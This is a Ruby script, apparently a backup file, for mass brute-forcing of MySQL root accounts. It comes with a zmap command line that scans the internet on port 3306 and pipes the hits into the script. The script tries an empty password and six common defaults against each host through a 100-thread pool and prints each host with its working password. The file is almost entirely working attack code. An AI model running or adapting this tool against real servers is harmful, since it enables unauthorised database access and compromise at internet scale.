mysql_brute.rb.bak
zmap -p 3306 -N 1000 -o - | ruby mysql_brute.rb
require 'mysql2'
require 'pp'
require 'thread/pool'
#gem install mysql2
#gem install thread
#if !ARGV[0]
# puts "usage: #{$0} <host_file>"
# exit
#end
# Candidate passwords, tried in this order against every target: the empty
# password first, then six common default values. The main loop below always
# pairs them with the account name 'root', so a server is only reported when
# its root account accepts a remote login with one of these seven values.
$passwords = [''] + %w[123456 admin root mysql password 111111]
#$passwords = [""]
# Performs a single MySQL login attempt per call and reports whether it worked.
class MysqlBrute
  def initialize; end

  # Opens one connection with the given credentials and runs a trivial query.
  #
  # Every call is a complete connect / authenticate / query / close cycle with a
  # 5 second connect timeout, so each attempt is a separate connection on the
  # server side.
  #
  # @param host [String] server address
  # @param username [String] account name to log in as
  # @param password [String] password to try (may be empty)
  # @param port [Integer] TCP port, 3306 when omitted
  # @return [Boolean] true only when the connection was established and
  #   `SELECT VERSION();` returned at least one row; false otherwise
  def run(host, username, password, port = 3306)
    client = nil
    authenticated = false
    begin
      client = Mysql2::Client.new(
        host: host,
        username: username,
        password: password,
        port: port,
        connect_timeout: 5
      )
      rows = client.query("SELECT VERSION();")
      authenticated = true if rows.size > 0
    rescue Mysql2::Error
      # Any Mysql2::Error from the connect or the query is swallowed on purpose
      # and counts as a failed attempt; other exception classes are not caught.
    ensure
      # Close the connection whether or not the attempt succeeded.
      client.close if client
    end
    authenticated
  end
end
# Main driver: reads target lines, extracts an IPv4 address (and optional port)
# from each, and queues one login attempt per candidate password.
#
# NOTE(review): seen from the server, every matched line results in seven
# separate root logins (one new connection per entry in $passwords), all from
# the same source, so a burst of access-denied events for root from one remote
# address is the observable trace. A root account that refuses remote logins,
# or whose password is not in $passwords, is never reported by this loop.
#
# Worker pool shared by all queued attempts; created with a size argument of 100
# (Thread.pool comes from the `thread` gem required at the top of the file).
$pool = Thread.pool(100)
# Input source: a host file named in ARGV[0], otherwise lines read with gets
# (standard input when no argument is given, as in the zmap pipeline).
if ARGV[0]
# read host file
File.open(ARGV[0], 'r') { |f|
f.each { |l|
# Unanchored match: takes the first dotted-quad IPv4 address found anywhere in
# the line (capture 1) plus an optional ":port" of 1-5 digits (capture 2). The
# port is not range-checked, so a value above 65535 is passed on unchanged.
re = /((?:(?:[0-9][0-9]?|[0-1][0-9][0-9]|[2][0-4][0-9]|[2][5][0-5])\.){3}(?:[0-9][0-9]?|[0-1][0-9][0-9]|[2][0-4][0-9]|[2][5][0-5]))(?:\:(\d{1,5}))?/.match l
if re && re[1]
# Port 3306 unless the line carried an explicit one.
port = 3306
port = re[2].to_i if re[2]
# One pool job per (host, password) pair; the account name is fixed to 'root'.
$passwords.each { |p|
# The target is handed to the job as a hash argument (received as obj) instead
# of being read from the surrounding locals.
$pool.process ({:host=>re[1], :user=>'root', :pass=>p, :port=>port}) { |obj|
if MysqlBrute.new.run(obj[:host], obj[:user], obj[:pass], obj[:port])
# Only successes are printed; the line carries the host and the working
# password in clear text on stdout.
puts "[SUCCESS]"+obj[:host]+" password is : " + obj[:pass]
else
#puts "[FAILED]"+obj[:host]+" of password :" + obj[:pass]
end
}
}
end
}
}
else
# Same per-line handling as the host-file branch, fed from gets. Here `re` and
# `port` are plain top-level locals that the while loop overwrites on every
# iteration, so each job has to rely on the values carried in its own obj hash.
while l = gets
re = /((?:(?:[0-9][0-9]?|[0-1][0-9][0-9]|[2][0-4][0-9]|[2][5][0-5])\.){3}(?:[0-9][0-9]?|[0-1][0-9][0-9]|[2][0-4][0-9]|[2][5][0-5]))(?:\:(\d{1,5}))?/.match l
if re && re[1]
port = 3306
port = re[2].to_i if re[2]
$passwords.each { |p|
$pool.process ({:host=>re[1], :user=>'root', :pass=>p, :port=>port}) { |obj|
if MysqlBrute.new.run(obj[:host], obj[:user], obj[:pass], obj[:port])
puts "[SUCCESS]"+obj[:host]+" password is : " + obj[:pass]
else
#puts "[FAILED]"+obj[:host]+" of password :" + obj[:pass]
end
}
}
end
end
end
#while !$pool.done? do
# pp $pool
# sleep 1
#end
# Block until the queued jobs have finished, then stop the pool's workers
# (behaviour of wait_done/shutdown as provided by the `thread` gem — confirm
# against the installed version).
$pool.wait_done
$pool.shutdown
# each line: MysqlBrute.new.run()